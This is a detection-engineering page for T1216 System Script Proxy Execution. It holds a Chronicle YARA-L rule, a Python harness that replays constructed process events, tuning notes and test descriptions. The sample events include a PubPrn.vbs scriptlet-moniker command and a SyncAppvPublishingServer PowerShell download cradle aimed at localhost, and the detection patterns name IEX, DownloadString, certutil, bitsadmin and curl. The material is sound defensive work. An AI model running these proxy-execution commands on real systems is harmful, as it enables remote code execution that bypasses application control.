T1216 Google Chronicle · YARA-L

Detect System Script Proxy Execution in Google Chronicle

Adversaries may use trusted scripts, often signed with Microsoft certificates, to proxy the execution of malicious files. Several Microsoft-signed scripts that ship with Windows or are downloadable from Microsoft can be abused to proxy execution of attacker-controlled content. The two sub-techniques are PubPrn.vbs (T1216.001, a printer publishing script that accepts a 'script:' COM scriptlet moniker as its second argument and executes the scriptlet it points at) and SyncAppvPublishingServer.vbs/.exe (T1216.002, an App-V publishing helper that passes its argument into a PowerShell pipeline, so PowerShell appended after a ';' in that argument is executed). Because these scripts are signed by Microsoft, they may bypass application control policies (AppLocker, WDAC) that trust Microsoft-signed content, and they evade script-based detection that focuses on unsigned or unknown interpreters. The technique sits under Defense Evasion and appears both in initial access payloads and in post-exploitation tooling.

MITRE ATT&CK

Tactic
Defense Evasion
Technique
T1216 System Script Proxy Execution
Canonical reference
https://attack.mitre.org/techniques/T1216/

YARA-L Detection Query

Google Chronicle (YARA-L)
rule T1216_System_Script_Proxy_Execution {
  meta:
    author = "Argus Detection Engineering"
    description = "Detects T1216 System Script Proxy Execution via PubPrn.vbs and SyncAppvPublishingServer proxy scripts. Covers direct invocation with scriptlet protocol abuse, SyncAppvPublishingServer.exe PowerShell pipeline proxy, and suspicious child process spawning from proxy script hosts."
    mitre_attack_tactic = "Defense Evasion"
    mitre_attack_technique = "T1216"
    mitre_attack_subtechniques = "T1216.001, T1216.002"
    severity = "HIGH"
    confidence = "HIGH"
    created = "2026-04-13"
    platform = "Windows"

  events:
    $e.metadata.event_type = "PROCESS_LAUNCH"
    $e.metadata.vendor_name = "Microsoft"
    (
      (
        re.regex($e.target.process.file.full_path, `(?i)\\(cscript|wscript)\.exe$`)
        and (
          re.regex($e.target.process.command_line, `(?i)pubprn\.vbs`)
          or re.regex($e.target.process.command_line, `(?i)syncappvpublishingserver\.vbs`)
          or re.regex($e.target.process.command_line, `(?i)script:`)
          or re.regex($e.target.process.command_line, `(?i)scrobj\.dll`)
          or re.regex($e.target.process.command_line, `(?i)scriptlet`)
        )
      )
      or
      (
        re.regex($e.target.process.file.full_path, `(?i)\\syncappvpublishingserver\.exe$`)
        and re.regex($e.target.process.command_line, `(?i)(invoke-expression|\biex\b|net\.webclient|downloadstring|-encodedcommand|-enc\b|start-process|start-bitstransfer)`)
      )
      or
      (
        re.regex($e.principal.process.file.full_path, `(?i)\\(cscript|wscript)\.exe$`)
        and (
          re.regex($e.principal.process.command_line, `(?i)pubprn\.vbs`)
          or re.regex($e.principal.process.command_line, `(?i)syncappvpublishingserver\.vbs`)
        )
        and re.regex($e.target.process.file.full_path, `(?i)\\(powershell|pwsh|cmd|mshta|rundll32|regsvr32|certutil|msiexec|wmic|bitsadmin|curl|wget)\.exe$`)
      )
    )

  condition:
    $e
}

Chronicle YARA-L 2.0 rule detecting T1216 System Script Proxy Execution on UDM PROCESS_LAUNCH events. Three conditions are OR-ed together: (1) cscript.exe or wscript.exe launched with a command line that names PubPrn.vbs or SyncAppvPublishingServer.vbs, or that carries scriptlet artefacts ('script:', scrobj.dll, 'scriptlet'); (2) SyncAppvPublishingServer.exe launched with PowerShell pipeline tokens (Invoke-Expression/IEX, Net.WebClient, DownloadString, -EncodedCommand, Start-Process, Start-BitsTransfer) in its arguments, which indicates injected PowerShell rather than a publishing refresh; and (3) a suspicious child (powershell, pwsh, cmd, mshta, rundll32, regsvr32, certutil, msiexec, wmic, bitsadmin, curl, wget) whose parent is cscript.exe or wscript.exe with one of the two proxy scripts on its command line. In the UDM model principal.process is the parent and target.process is the spawned process. Two things to keep in mind: condition (1) fires on any cscript/wscript invocation of PubPrn.vbs, with or without a 'script:' moniker, and the metadata.vendor_name = "Microsoft" clause limits the rule to Sysmon and Windows event log sources, so drop or widen that clause if process telemetry arrives through a third-party EDR parser.

Data Sources

  • Google Chronicle with Windows Sysmon forwarding
  • Chronicle Unified Data Model (UDM) PROCESS_LAUNCH events
  • Windows Event Forwarding (WEF) to Chronicle

Required Tables

  • UDM PROCESS_LAUNCH events
  • Chronicle entity graph for process lineage

False Positives & Tuning

  • Legitimate App-V application publishing during scheduled maintenance windows where SyncAppvPublishingServer.exe is invoked by SCCM without PS proxy arguments
  • IT administrator scripts that wrap PubPrn.vbs in automation pipelines for bulk printer provisioning. Condition (1) matches on the script name alone, so these invocations do fire; tune by requiring a 'script:' moniker alongside pubprn.vbs, or by excluding known provisioning hosts and the service accounts that run them
  • Security testing infrastructure running authorized T1216 atomic tests as part of continuous detection validation programs
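To see which of the three conditions fire on concrete telemetry, and what the PubPrn tuning above changes, here is an added Python re-implementation of the rule's matching logic run over hand-constructed UDM-shaped PROCESS_LAUNCH records. It is example code written for this page, not the Argus rule or any Chronicle code: the event layout, paths and command lines are constructed to mirror the test cases and false-positive cases described here, and `require_scriptlet_for_pubprn` is a hypothetical tuning knob rather than a rule option.

```python
import re

# Regexes transcribed from the YARA-L rule above; (?i), \b and anchors behave alike in RE2 and Python re.
SCRIPT_HOST = re.compile(r"(?i)\\(cscript|wscript)\.exe$")
PUBPRN = re.compile(r"(?i)pubprn\.vbs")
APPV_VBS = re.compile(r"(?i)syncappvpublishingserver\.vbs")
SCRIPTLET = re.compile(r"(?i)(script:|scrobj\.dll|scriptlet)")
APPV_EXE = re.compile(r"(?i)\\syncappvpublishingserver\.exe$")
PS_PIPELINE = re.compile(r"(?i)(invoke-expression|\biex\b|net\.webclient|downloadstring"
                         r"|-encodedcommand|-enc\b|start-process|start-bitstransfer)")
SUSPICIOUS_CHILD = re.compile(r"(?i)\\(powershell|pwsh|cmd|mshta|rundll32|regsvr32|certutil"
                              r"|msiexec|wmic|bitsadmin|curl|wget)\.exe$")


def _field(event, *path):
    """Walk nested dict keys like a UDM field path; return "" when the field is absent."""
    node = event
    for key in path:
        node = node.get(key, {}) if isinstance(node, dict) else {}
    return node if isinstance(node, str) else ""


def matched_conditions(event, require_scriptlet_for_pubprn=False):
    """Return the rule conditions (1, 2, 3) one PROCESS_LAUNCH event satisfies.

    require_scriptlet_for_pubprn is a hypothetical tuning knob, not a rule option: when True a bare
    pubprn.vbs reference fires condition 1 only if script:, scrobj.dll or scriptlet is also present.
    """
    if _field(event, "metadata", "event_type") != "PROCESS_LAUNCH":
        return []
    if _field(event, "metadata", "vendor_name") != "Microsoft":
        return []  # the rule's vendor_name pin: events from other parsers never match
    t_path = _field(event, "target", "process", "file", "full_path")
    t_cmd = _field(event, "target", "process", "command_line")
    p_path = _field(event, "principal", "process", "file", "full_path")
    p_cmd = _field(event, "principal", "process", "command_line")
    hits = []
    # (1) cscript/wscript launched with a proxy script name or scriptlet artefacts in its arguments
    if SCRIPT_HOST.search(t_path):
        pubprn_fires = bool(PUBPRN.search(t_cmd)) and not require_scriptlet_for_pubprn
        if pubprn_fires or APPV_VBS.search(t_cmd) or SCRIPTLET.search(t_cmd):
            hits.append(1)
    # (2) SyncAppvPublishingServer.exe handed PowerShell pipeline tokens
    if APPV_EXE.search(t_path) and PS_PIPELINE.search(t_cmd):
        hits.append(2)
    # (3) suspicious child whose parent is cscript/wscript with a proxy script on its command line
    if (SCRIPT_HOST.search(p_path) and (PUBPRN.search(p_cmd) or APPV_VBS.search(p_cmd))
            and SUSPICIOUS_CHILD.search(t_path)):
        hits.append(3)
    return hits


def process_launch(target_path, target_cmd, parent_path, parent_cmd, vendor="Microsoft"):
    """Build a minimal UDM-shaped PROCESS_LAUNCH record (constructed, not real telemetry)."""
    return {"metadata": {"event_type": "PROCESS_LAUNCH", "vendor_name": vendor},
            "principal": {"process": {"file": {"full_path": parent_path}, "command_line": parent_cmd}},
            "target": {"process": {"file": {"full_path": target_path}, "command_line": target_cmd}}}


SYS32 = r"C:\Windows\System32"
CSCRIPT, CMD = SYS32 + r"\cscript.exe", SYS32 + r"\cmd.exe"
POWERSHELL = SYS32 + r"\WindowsPowerShell\v1.0\powershell.exe"
PUBPRN_PATH = SYS32 + r"\Printing_Admin_Scripts\en-US\pubprn.vbs"
APPV_VBS_PATH, APPV_EXE_PATH = SYS32 + r"\SyncAppvPublishingServer.vbs", SYS32 + r"\SyncAppvPublishingServer.exe"
SCRIPTLET_CMD = f'cscript.exe "{PUBPRN_PATH}" 127.0.0.1 script:http://127.0.0.1:8080/t1216.sct'
APPV_VBS_CMD = f'cscript.exe "{APPV_VBS_PATH}" "n;Write-Output t1216 > %TEMP%\\t1216-test.txt"'
CRADLE_CMD = "SyncAppvPublishingServer.exe \"n;(New-Object Net.WebClient).DownloadString('http://127.0.0.1:9090/a.ps1') | IEX\""

# Constructed sample events mirroring the tests and false-positive cases on this page.
SAMPLE_EVENTS = {
    # Test 1: scriptlet moniker handed to PubPrn.vbs
    "pubprn_scriptlet": process_launch(CSCRIPT, SCRIPTLET_CMD, r"C:\Windows\explorer.exe", "explorer.exe"),
    # legitimate bulk printer provisioning: same script, a UNC printer path instead of a moniker
    "pubprn_provisioning": process_launch(CSCRIPT, f'cscript.exe "{PUBPRN_PATH}" printsrv01 \\\\printsrv01\\HP-LJ4',
                                          CMD, "cmd.exe /c provision-printers.cmd"),
    # Test 3: SyncAppvPublishingServer.exe with a download cradle in its argument
    "appv_exe_cradle": process_launch(APPV_EXE_PATH, CRADLE_CMD, CMD, "cmd.exe"),
    # scheduled App-V publishing refresh with no PowerShell tokens in the argument
    "appv_exe_scheduled": process_launch(APPV_EXE_PATH, 'SyncAppvPublishingServer.exe "n"',
                                         SYS32 + r"\svchost.exe", "svchost.exe -k netsvcs -s Schedule"),
    # Test 2, parent side: cscript launching the App-V publishing script
    "appv_vbs_launch": process_launch(CSCRIPT, APPV_VBS_CMD, CMD, "cmd.exe"),
    # Test 2, child side: powershell.exe spawned by that cscript
    "appv_vbs_child": process_launch(POWERSHELL, 'powershell.exe -NoProfile -Command "Write-Output t1216"',
                                     CSCRIPT, APPV_VBS_CMD),
    # Test 1 again but recorded by a third-party EDR parser: the vendor_name pin drops it
    "pubprn_scriptlet_edr": process_launch(CSCRIPT, SCRIPTLET_CMD, r"C:\Windows\explorer.exe", "explorer.exe",
                                           vendor="ExampleEDR"),
}


def evaluate(events, require_scriptlet_for_pubprn=False):
    """Map each sample label to the list of conditions it triggers."""
    return {label: matched_conditions(ev, require_scriptlet_for_pubprn) for label, ev in events.items()}


if __name__ == "__main__":
    for tuned in (False, True):
        print(f"--- require_scriptlet_for_pubprn={tuned}")
        for label, hits in evaluate(SAMPLE_EVENTS, tuned).items():
            print(f"  {label:22s} -> {hits or 'no match'}")
```

The untuned pass reports `pubprn_provisioning -> [1]`, which is exactly the false positive the PubPrn tuning bullet describes; the tuned pass reports no match for it while the Test 1 moniker case still fires on the `script:` token. The `ExampleEDR` event never matches, which is the effect of the rule's `metadata.vendor_name` pin when telemetry comes through a non-Microsoft parser, and the scheduled App-V refresh stays quiet because condition (2) needs PowerShell tokens, not merely the binary.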

Testing Methodology

Validate this detection against the four Atomic Red Team-style test cases below. Each test lists the behaviour to exercise and the telemetry you should expect to see; the executable commands and cleanup steps are not reproduced on this page.

  1. Test 1: PubPrn.vbs Scriptlet Execution via script: Protocol

    Expected signal: Sysmon Event ID 1: Process Create with Image=cscript.exe, CommandLine containing 'pubprn.vbs' and 'script:http://127.0.0.1'. Sysmon Event ID 3: Network Connection attempt to 127.0.0.1:8080 from cscript.exe. Security Event ID 4688 if command line auditing is enabled.

  2. Test 2: SyncAppvPublishingServer.vbs PowerShell Pipeline Injection

    Expected signal: Sysmon Event ID 1: cscript.exe with CommandLine containing 'SyncAppvPublishingServer.vbs' and 'Write-Output'. Child process Sysmon Event ID 1: powershell.exe spawned by cscript.exe executing the injected command. Sysmon Event ID 11: File Create for t1216-test.txt in %TEMP%.

  3. Test 3: SyncAppvPublishingServer.exe Direct Invocation with PowerShell Download Cradle

    Expected signal: Sysmon Event ID 1: SyncAppvPublishingServer.exe with CommandLine containing 'Invoke-Expression' and 'Net.WebClient'. Sysmon Event ID 3: Network Connection attempt to 127.0.0.1:9090. Security Event ID 4688 with full command line.

  4. Test 4: PubPrn.vbs Used from Non-Standard Location (Bypass Detection by Path)

    Expected signal: Sysmon Event ID 11: File Create for pubprn.vbs in %TEMP% (potential staging artifact). Sysmon Event ID 1: cscript.exe with CommandLine referencing %TEMP%\pubprn.vbs and the 'script:' URL. Sysmon Event ID 3: Network Connection attempt from cscript.exe.
